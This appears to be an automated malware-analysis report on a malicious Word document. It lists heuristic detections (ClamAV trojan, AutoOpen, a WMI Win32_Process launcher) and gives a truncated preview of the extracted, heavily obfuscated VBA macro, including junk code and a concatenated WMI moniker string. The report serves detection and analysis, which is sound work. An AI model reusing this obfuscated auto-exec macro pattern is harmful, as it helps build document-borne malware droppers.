MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The sample is a malicious Office document containing a VBA macro. The macro utilizes a GetObject call to launch the Win32_Process WMI object, which is a common technique for executing arbitrary code. This strongly suggests the macro's purpose is to download and execute a second-stage payload. The presence of an 'autoopen' marker further indicates an attempt at automatic execution upon opening the document.
Heuristics 8
-
ClamAV: Doc.Trojan.Agent-6865779-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Agent-6865779-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 67496 bytes |
SHA-256: feb2e8da134ee9772f4e702930e68cb22a69c4991da7b61a03a2ab9419b9a875 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "w77_53"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "O_50_774"
Function T66601()
Select Case u95___
Case 597006865
E_210_ = Log(i37381)
a_61770 = CDate(151534258)
i_7442 = Fix(573579794 + 752050419 + A013641_ - Oct(887969649))
f_05_4_ = Cos(768775770 - Sqr(611325877 - Atn(261974595)) - 971638103 + 111750113)
End Select
Select Case C97_82
Case 278688654
H213_7 = Log(w5929_)
f98_6_5 = CDate(684312635)
z4_9_31 = Fix(252831619 + 754090176 + V___809 - Oct(908347358))
o94_8__ = Cos(613966850 - Sqr(287766295 - Atn(747657348)) - 328224497 + 320591154)
End Select
Select Case Y90760_5
Case 580070389
R89__3 = Log(E7__24)
t__3641_ = CDate(22054463)
b9_33__ = Fix(602565754 + 756292340 + v_60_40 - Oct(856926338))
i_17__ = Cos(729590920 - Sqr(87467166 - Atn(489760208)) - 752933649 + 912667544)
End Select
Select Case K_52_27_
Case 177333787
k3__2_3 = Log(w_41_10)
w5_36_0_ = CDate(655480252)
h_499__ = Fix(759729688 + 916753652 + r64_595 - Oct(234308573))
H24798_ = Cos(158800170 - Sqr(91612982 - Atn(383639002)) - 316115768 + 668786398)
End Select
Select Case Z6__6_5
Case 285496016
L_0_0_ = Log(M776_77_)
Z__556 = CDate(419865413)
o__13__ = Fix(999562846 + 661461244 + B545_9_ - Oct(85031302))
S87__47 = Cos(869290511 - Sqr(585131624 - Atn(305539742)) - 528683759 + 503737552)
End Select
Select Case Z098444_
Case 361829639
X98010 = Log(L_7_9_1)
k0425__0 = CDate(552518153)
c4_4__57 = Fix(717034400 + 162176873 + Y17_1_19 - Oct(164101860))
H0032__ = Cos(948896218 - Sqr(458622766 - Atn(335761700)) - 247279783 + 65008454)
End Select
Select Case z99314
Case 129959308
F__59__ = Log(M_3834)
z_9900_5 = CDate(137557560)
v__6196 = Fix(552123428 + 873937833 + j_8838_ - Oct(419434354))
Z3442_ = Cos(429344521 - Sqr(201169827 - Atn(979967955)) - 13894415 + 436137061)
End Select
Select Case C37_180
Case 108455735
P3__5_ = Log(R_028__)
s1__85 = CDate(250678368)
W092__ = Fix(361438588 + 901971494 + L4905_0 - Oct(526280935))
i8_37_1_ = Cos(324762076 - Sqr(733685562 - Atn(821460567)) - 605602818 + 118877269)
End Select
End Function
Function i_70_275(r4572__, k4___9_)
On Error Resume Next
Select Case l28_64
Case 959725067
K840349 = Log(R6_59903)
N_40_6 = CDate(418386698)
K2_68096 = Fix(113907901 + 854125529 + k44__267 - Oct(905263432))
r_67__ = Cos(407073994 - Sqr(248341252 - Atn(772540463)) - 8154078 + 840156377)
End Select
Select Case S_0_9494
Case 578409755
m58462 = Log(Z3_155_)
a59__47 = CDate(154944219)
w52__4 = Fix(734345708 + 781951147 + M_63988 - Oct(353845467))
Z_91_4_ = Cos(385865863 - Sqr(767592528 - Atn(64585333)) - 119409880 + 97014600)
End Select
d131888 = z601495 + "winmgmts:Win32" + "_ProcessStartup" + c91__5
Select Case R22_65
Case 792918848
j_9_3_ = Log(c43__29)
V6_857 = CDate(938201937)
j58_3860 = Fix(68478561 + 303797768 + O0471236 - Oct(591699553))
k5_6805 = Cos(518396187 - Sqr(686036972 - Atn(157877705)) - 425619283 + 158885138)
End Select
Select Case Y9248695
Case 133364163
A647989 = Log(X6_5093)
z_5_214 = CDate(387436246)
q579_21_ = Fix(670992951 + 311723520 + K9_610 - Oct(814344261))
N__33414 = Cos(16961
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.